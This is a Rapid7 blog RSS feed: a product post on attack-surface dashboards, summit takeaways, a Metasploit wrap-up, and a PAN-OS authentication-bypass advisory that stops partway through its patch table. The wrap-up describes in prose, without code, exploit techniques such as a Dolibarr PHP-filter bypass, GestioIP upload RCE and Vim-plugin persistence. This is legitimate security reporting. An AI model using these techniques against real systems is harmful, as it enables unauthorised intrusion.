<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Wed, 20 May 2026 20:47:48 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/rss.xml" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Operationalizing CTEM Faster: Build Surface Command Dashboards in Minutes]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Modern attack surfaces don’t sit still.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud expansion, SaaS sprawl, identity complexity, and shadow IT are continuously reshaping organizational risk. For security leaders, visibility isn’t the challenge anymore, but actually operationalizing that visibility is.</span></p><p style="direction: ltr;"><a href="/products/command/attack-surface-management-asm" target="_self"><span style='font-size: undefined;'>Surface Command</span></a><span style='font-size: undefined;'> was built to unify asset and identity intelligence across your external attack surface. But translating that intelligence into executive-ready dashboards or operational reporting has often required knowledge of Cypher queries.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Today, that changes: We’re introducing filter-based dashboard widgets in Surface Command, enabling teams to build meaningful attack surface management (ASM) dashboards in minutes, without writing a single query.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>And for CISOs focused on advancing continuous threat exposure management (</span><a href="/fundamentals/what-is-continuous-threat-exposure-management-ctem" target="_self"><span style='font-size: undefined;'>CTEM</span></a><span style='font-size: undefined;'>), this is more than a usability enhancement. It’s an operational accelerator.</span></p><h2 style="direction: ltr;">From filters to dashboards, instantly</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Security teams already use saved asset and identity filters to answer critical questions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Which internet-facing assets are high risk?</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Where do privileged identities intersect with exploitable exposures?</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Which business units own unmanaged cloud infrastructure?</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>What third-party SaaS applications expand our attack surface?</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Now, those same saved filters can be converted directly into live dashboard widgets. If your team can build a filter table, they can now build a dashboard.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>There’s no need to understand query syntax or rely on specialized expertise for common reporting needs. With just a few clicks, exposure views become shareable, persistent dashboards built on the same unified data model that powers Surface Command.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt51790baad3aee306/6a0da70ae87c5635588dfa70/Widgets-dashboard-rapid7-command-platform.png" alt="Widgets-dashboard-rapid7-command-platform.png" caption="Figure 1: Creating dashboard “widgets” in the Rapid7 Command Platform" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Widgets-dashboard-rapid7-command-platform.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt51790baad3aee306/6a0da70ae87c5635588dfa70/Widgets-dashboard-rapid7-command-platform.png" data-sys-asset-uid="blt51790baad3aee306" data-sys-asset-filename="Widgets-dashboard-rapid7-command-platform.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Creating dashboard “widgets” in the Rapid7 Command Platform" data-sys-asset-alt="Widgets-dashboard-rapid7-command-platform.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Creating dashboard “widgets” in the Rapid7 Command Platform</figcaption></div></figure><h2>Reducing friction in exposure reporting</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For many organizations, the barrier to effective exposure management isn’t visibility, it’s friction. When dashboard creation requires query expertise, reporting slows down, operational teams depend on a small group of power users, executive visibility lags behind exposure reality, and CTEM initiatives stall under complexity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Filter-based widgets remove that bottleneck. Security teams can now spin up exposure dashboards in minutes, empower analysts and vulnerability teams to self-serve, deliver consistent reporting to leadership, and standardize exposure views across business units.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This lowers the barrier to building and maintaining exposure intelligence across the organization, and that matters when “continuous” is the goal.</span></p><h2 style="direction: ltr;">A practical enabler for continuous threat exposure management (CTEM)</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond a framework, CTEM is a discipline. One that treats exposure management as an ongoing cycle, not a point-in-time project. CTEM is commonly organized into five continuous steps:</span></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Scope</strong></span><span style='font-size: undefined;'> – Define what you’re focusing on (systems, business services, exposure themes, time horizons).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Discover</strong></span><span style='font-size: undefined;'> – Identify the assets, identities, and exposures within scope.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Prioritize</strong></span><span style='font-size: undefined;'> – Determine what matters most based on risk and impact.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Validate</strong></span><span style='font-size: undefined;'> – Confirm exploitability and real-world likelihood.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Mobilize</strong></span><span style='font-size: undefined;'> – Drive remediation and measure progress.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>The challenge isn’t describing these steps. It’s making them repeatable in day-to-day operations, and that’s where filter-based dashboard widgets help.</span></p><h3 style="direction: ltr;">Making “scope” real, not a slide deck</h3><p style="direction: ltr;"><span style='font-size: undefined;'>CTEM often succeeds or fails at the first step: scope. If “scope” lives in a document, teams interpret it differently. If it lives on the platform, it becomes operational.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Saved filters are an effective way to define scope in a way teams can actually use. Let’s take a look at some examples:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>“Internet-facing assets owned by customer-facing business units”</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>“Privileged identities with access to production”</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>“Externally exposed services supporting payment workflows”</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>“Cloud assets without an identified owner”</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>With filter-based widgets, you can turn those scoped views into dashboards that make CTEM focus areas visible and persistent. This helps teams stay aligned on what you’re measuring and why.</span></p><h3><span style='font-size: undefined;'>Operationalizing discovery and prioritization</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Once scope is defined, CTEM demands continuous discovery and prioritization. Filter-based widgets support that by making key exposure views always available, such as:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Newly discovered external assets in a critical business unit</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>High-risk exposures on internet-facing systems</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Identity-driven exposure hotspots (where access and exposure intersect)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Business-unit risk breakdowns for ownership and accountability</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Instead of rebuilding reports each cycle, teams can use dashboards to maintain ongoing awareness of what has changed.</span></p><h3 style="direction: ltr;">Supporting validation and mobilization with “always-on” views</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Validation and mobilization are where CTEM becomes measurable. While advanced workflows still benefit from deeper investigation and custom analysis, filter-based dashboards help teams maintain consistent operational pressure: Are the highest priority exposures shrinking week over week? Are the same teams repeatedly accumulating unmanaged assets? Are privileged identity risks trending in the right direction?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Dashboards don’t replace validation, but they make it easier to target validation where it matters, and to keep remediation efforts aligned to the scoped CTEM goals.</span></p><h2 style="direction: ltr;">Built on the Command Platform: unified data, real-time context</h2><p style="direction: ltr;"><span style='font-size: undefined;'>These filter-based widgets aren’t layered on top of a separate reporting engine. They’re instead powered directly by the Command Platform’s unified asset and identity graph, which is the same continuously updated data model that drives Surface Command.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That means widgets reflect real-time exposure state, asset and identity relationships stay connected, context holds across domains, and dashboards scale as your attack surface evolves.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For CISOs, this is what turns reporting into decision support: consistent data, consistent definitions, and visibility that doesn’t lag behind reality.</span></p><h2 style="direction: ltr;">Accessibility without sacrificing power</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Most reporting can now be built from easy-to-use filter tables, without the learning curve associated with Cypher.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For advanced correlation, custom logic, and complex investigations, teams can still leverage custom queries. The result is balance: Accessibility for most users and flexibility for advanced practitioners – all via one unified platform.</span></p><h2 style="direction: ltr;">Turning exposure intelligence into executive clarity</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Surface Command was built to give organizations a unified view of their external attack surfaces across assets, identities, and exposures.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With filter-based dashboard widgets, that intelligence becomes easier to operationalize, easier to share, and easier to scale, especially for CTEM programs that rely on repeatability.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because </span><a href="/products/command/exposure-management" target="_self"><span style='font-size: undefined;'>continuous threat exposure management</span></a><span style='font-size: undefined;'> shouldn’t depend on who knows how to write a query. It should be built into the way your platform works.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-operationalizing-ctem-building-surface-command-dashboards</link>
      <guid isPermaLink="false">bltff928a05a77e7022</guid>
      <category><![CDATA[Cloud Security]]></category>
      <category><![CDATA[Surface Command]]></category><dc:creator><![CDATA[Ed Montgomery]]></dc:creator>
      <pubDate>Wed, 20 May 2026 12:15:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7’s 2026 Global Cybersecurity Summit: Key Takeaways for Security Leaders]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Security teams are working in an environment where speed, scale, and complexity are all increasing at the same time. Across the </span><a href="https://rapid7.brighttalk.com/summit/7926/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-1-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span style='font-size: undefined;'>Rapid7 2026 Global Cybersecurity Summit</span></a><span style='font-size: undefined;'>, the focus was not just on how the threat landscape is evolving, but on how teams are adapting their approach to keep up.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The sessions brought together perspectives from across detection and response, exposure management, AI, and security operations, with a consistent emphasis on making better decisions earlier and with more confidence.</span></p><h2 style="direction: ltr;">How modern attacks are starting across identity, cloud, and social engineering</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Several sessions explored how initial access has shifted toward identity misuse, social engineering, and cloud misconfigurations. These entry points often blend into normal activity, making it harder for teams to distinguish between legitimate behavior and early-stage compromise.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Understanding how attacks begin has become a critical part of detection strategy. Rather than relying on a single signal, teams need to recognize how activity develops across multiple systems and how seemingly low-risk events can connect into something more serious.</span></p><h2 style="direction: ltr;">What real incident response looks like inside modern MDR and SOC teams</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The sessions focused on MDR and the SOC provided a closer look at how incidents unfold in practice. Investigations rarely follow a clean path, and analysts are constantly making decisions with incomplete information while attackers continue to move.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What stands out is how MDR extends the SOC beyond detection, combining continuous monitoring with human-led response to guide organizations through incidents as they happen. Alerts initiate the process, but outcomes depend on how teams interpret signals, prioritize actions, and manage tradeoffs under pressure across cloud, identity, and on-prem environments.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This view highlights the operational reality behind incident response, where coordination and judgment shape the outcome as much as the technology itself.</span></p><h2 style="direction: ltr;">Why complexity is slowing security teams down</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Security environments continue to expand, bringing more tools, more data, and more potential points of failure. Across the summit, speakers highlighted how fragmented visibility and unclear ownership can make it difficult to maintain a consistent view of risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The challenge is not eliminating complexity, but managing it in a way that allows teams to act effectively. Organizations that focus on clarity, ownership, and prioritization are better positioned to respond when signals start to converge.</span></p><h2 style="direction: ltr;">How exposure management is reshaping risk prioritization</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A recurring theme was the shift from vulnerability management toward exposure management. Vulnerability data provides insight into what exists, but it does not always reflect what creates meaningful risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure management adds context by connecting vulnerabilities to assets, identities, and business impact. This allows teams to focus on what is reachable and relevant, helping them prioritize based on real-world risk rather than volume alone.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Frameworks like CTEM were highlighted as a practical way to structure this approach, creating a continuous process that connects discovery, validation, and response.</span></p><h2 style="direction: ltr;">How AI is influencing both attacker behavior and defender workflows</h2><p style="direction: ltr;"><span style='font-size: undefined;'>AI is now influencing both sides of the security equation. Attackers are using it to scale reconnaissance and improve the effectiveness of social engineering, while defenders are applying it to reduce alert fatigue and accelerate analysis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The discussion focused on how AI fits into real workflows, particularly in areas such as triage, enrichment, and investigation. Teams are finding the most value when AI is used to support decision-making rather than replace it, with transparency and oversight remaining central to adoption.</span></p><h2 style="direction: ltr;">How security operations are shifting in practice</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Across the summit, a clear direction emerged. Security operations are moving toward earlier action, more informed prioritization, and tighter integration between exposure, detection, and response.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This shift is reflected in how teams are building workflows that connect signals across environments and allow them to act before an incident escalates. It also reflects a broader move toward confidence in decision-making, where context and clarity are just as important as visibility.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Sound good? All sessions are available to catch up on, on demand </span><a href="https://rapid7.brighttalk.com/summit/7926/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-1-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>. </span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-2026-global-cybersecurity-summit-key-takeaways-security-leaders</link>
      <guid isPermaLink="false">blt6a48907db062050e</guid>
      <category><![CDATA[Events]]></category><dc:creator><![CDATA[Emma Burdett]]></dc:creator>
      <pubDate>Tue, 19 May 2026 15:22:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7652fa46396969f5/69a59e6cfbdb4d75ad7755a9/REQ-14706_-_1600x900px.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 05/15/2026]]></title>
      <description><![CDATA[<p></p><h2>Weaponizing a text editor for fun and profit</h2><p>Gather round, dear readers, because today, we (by we, we mean @h00die) dropped the ultimate persistence mechanism: Vim plugin persistence. And honestly, calling it "persistence" feels redundant — Vim is already the most persistent thing ever. Somewhere, somehow, there will still be a Vim session open since 2011, because no one has figured out how to close it. So we are not so much establishing a foothold here as we are joining an existing hostage situation.</p><p>Elsewhere this week, Marvell's QConvergeConsole has been caught handing arbitrary files to unauthenticated visitors, as is tradition (CVE-2025-6793), GestioIP 3.5.7 ships an upload handler, so trusting it will cheerfully let an admin overwrite the handler with a backdoor and then dutifully execute it (CVE-2024-48760). And of course, we can't forget about Dolibarr ERP/CRM, which blocks PHP injections by checking — and we cannot stress this enough — by searching for string &lt;?php. So @M4nu02 brought an elaborate module which changes &lt;?php to &lt;?PHP in the payload to successfully bypass this mitigation (CVE-2023-30253). Truly a wonderful time to be alive.</p><h2></h2><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80fb065b3abb4a91/6a076d2ec9bda18363c9f093/vim-meme.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="vim-meme.png" asset-alt="vim-meme.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80fb065b3abb4a91/6a076d2ec9bda18363c9f093/vim-meme.png" data-sys-asset-uid="blt80fb065b3abb4a91" data-sys-asset-filename="vim-meme.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="vim-meme.png" sys-style-type="display"/></figure><h2>New module content (4)</h2><h3>Marvell QConvergeConsole Path Traversal (CVE-2025-6793)</h3><p>Authors: Michael Heinzl and rgod</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21322">#21322</a> contributed by <a href="https://github.com/h4x-x0r">h4x-x0r</a></p><p>Path: gather/qconvergeconsole_traversal</p><p>CVE reference: ZDI-25-450</p><p>Description: This adds a new auxiliary module that exploits a path traversal vulnerability (CVE-2025-6793) in Marvell QConvergeConsole to read arbitrary files from the target host. Marvell QConvergeConsole versions 5.5.0.85 and earlier are vulnerable, and no authentication is required to exploit the issue.</p><h3>VIM Plugin Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21206">#21206</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/persistence/vim_plugin</p><p>Description: This adds a new Linux persistence module, which establishes persistence by writing a Vim plugin to the target user's ~/.vim/plugin/ directory. The next time that user launches Vim, the plugin executes the configured payload and opens a new session as that user.</p><h3>GestioIP 3.5.7 Remote Command Execution</h3><p>Authors: maxibelino and odeez24</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21041">#21041</a> contributed by <a href="https://github.com/Odeez24">Odeez24</a></p><p>Path: multi/http/gestioip_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2024-48760&amp;referrer=blog">CVE-2024-48760</a></p><p>Description: This adds an exploit module for an authenticated remote code execution vulnerability in GestioIP 3.5.7 (CVE-2024-48760). An attacker with admin credentials can abuse the unsafe upload handler at /api/upload.cgi to overwrite the script itself with a backdoor, which is then invoked to execute attacker-supplied commands.</p><h3>Dolibarr ERP/CRM Authenticated Code Injection</h3><p>Authors: Emanuele Cervelli and Tinexta Cyber Offensive Security Team</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21362">#21362</a> contributed by <a href="https://github.com/M4nu02">M4nu02</a></p><p>Path: unix/http/dolibarr_cms_rce_cve_2023_30253</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2023-30253&amp;referrer=blog">CVE-2023-30253</a></p><p>Description: This adds a new exploit module for Dolibarr ERP/CRM (CVE-2023-30253), an authenticated PHP code injection vulnerability affecting versions before 17.0.1. The module abuses the Website module to inject a payload that bypasses Dolibarr's PHP tag filter by using uppercase &lt;?PHP tags instead of the filtered lowercase form. Valid credentials with access to the Website module are required.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20617">#20617</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Adds an OptArray datastore option type to the framework. Previously multi valued datastore options were usually input as comma separated strings, now Metasploit devs have the option to use OptArray.</li></ul><h2>Bugs fixed (0)</h2><p>None</p><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-08T17%3A05%3A58%2B01%3A00..2026-05-14T12%3A44%3A22Z%22">Pull Requests 6.4.132...6.4.133</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.132...6.4.133">Full diff 6.4.132...6.4.133</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-05-15-2026</link>
      <guid isPermaLink="false">blt1ce1cb7945d4374c</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Martin Sutovsky]]></dc:creator>
      <pubDate>Fri, 15 May 2026 18:54:25 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS]]></title>
      <description><![CDATA[<h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Overview</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>On May 13, 2026, Palo Alto Networks published a </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>CVE-2026-0265</span></a><span style='font-size: undefined;'>, a </span><a href="https://cwe.mitre.org/data/definitions/347.html" target="_blank"><span style='font-size: undefined;'>signature verification vulnerability</span></a><span style='font-size: undefined;'> that facilitates authentication bypass on </span><a href="https://docs.paloaltonetworks.com/pan-os" target="_blank"><span style='font-size: undefined;'>PAN-OS</span></a><span style='font-size: undefined;'>, the operating system that most Palo Alto Networks firewalls run. This vulnerability allows a remote unauthenticated attacker with network access to bypass authentication when </span><a href="https://docs.paloaltonetworks.com/pan-os/10-1/pan-os-new-features/identity-features/cloud-identity-engine" target="_blank"><span style='font-size: undefined;'>Cloud Authentication Service (CAS)</span></a><span style='font-size: undefined;'> is enabled and attached to a login interface; the vulnerable configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances. Cloud NGFW and Prisma Access are not affected.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Palo Alto Networks </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Severity:%20HIGH" target="_blank"><span style='font-size: undefined;'>assigned</span></a><span style='font-size: undefined;'> CVE-2026-0265 a “High” 7.2 CVSS score. The advisory states that the vulnerability’s severity scoring depends on interface exposure; according to the vendor, risk is highest for unrestricted management interfaces equipped with CAS, while other login portals, such as GlobalProtect gateways, are lower risk. However, the researcher who reported the vulnerability, </span><a href="https://x.com/rootxharsh" target="_blank"><span style='font-size: undefined;'>Harsh Jaiswal</span></a><span style='font-size: undefined;'> of </span><a href="https://www.hacktron.ai/" target="_blank"><span style='font-size: undefined;'>HacktronAI</span></a><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><strong>publicly disputed the vendor’s severity rating</strong></span><span style='font-size: undefined;'>. Jaiswal </span><a href="https://x.com/rootxharsh/status/2054862374621032774" target="_blank"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> on social media that the vulnerability advisory misrepresents the criticality of the bug and the affected components; according to the HacktronAI research team, they successfully exploited CVE-2026-0265 to bypass authentication controls on multiple corporations’ GlobalProtect portals and establish VPN access. Jaiswal </span><a href="https://x.com/rootxharsh/status/2054924700971921635" target="_blank"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> that </span><span style='font-size: undefined;'><strong>internet-facing components are affected</strong></span><span style='font-size: undefined;'>, and HacktronAI </span><a href="https://x.com/rootxharsh/status/2054862374621032774" target="_blank"><span style='font-size: undefined;'>plans to disclose</span></a><span style='font-size: undefined;'> full technical details the week of May 18.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of May 14, Palo Alto Networks has not confirmed exploitation in-the-wild of CVE-2026-0265, and there is no public proof-of-concept exploit available. However, given the researcher's statements about the practical exploitability of this vulnerability and the pending disclosure of technical details, this will likely evolve. PAN-OS software has been a frequent target for threat actors; on May 6, 2026, the PAN-OS vulnerability </span><a href="https://www.rapid7.com/blog/post/etr-critical-buffer-overflow-in-palo-alto-networks-pan-os-user-id-authentication-portal-cve-2026-0300/" target="_blank"><span style='font-size: undefined;'>CVE-2026-0300</span></a><span style='font-size: undefined;'> was </span><a href="https://www.cisa.gov/news-events/alerts/2026/05/06/cisa-adds-one-known-exploited-vulnerability-catalog" target="_blank"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to CISA's Known Exploited Vulnerabilities (KEV) catalog. Patches for many affected version streams </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Solution" target="_blank"><span style='font-size: undefined;'>were published</span></a><span style='font-size: undefined;'> on May 13, and the remaining patches </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Solution" target="_blank"><span style='font-size: undefined;'>are expected</span></a><span style='font-size: undefined;'> on May 28, 2026.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Mitigation guidance</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running PA-Series or VM-Series firewalls, or Panorama (virtual and M-Series) appliances, with Cloud Authentication Service (CAS) enabled should upgrade to a fixed version on an emergency basis. Patches are partially available, with many version stream fixes published on May 13 and additional version stream coverage expected on May 28. The following table outlines the affected and fixed versions:</span></p><table><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>PAN-OS version</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fixed</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.7 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.4-h17 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.12 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.7-h6 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.15 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.7-h34 (ETA: 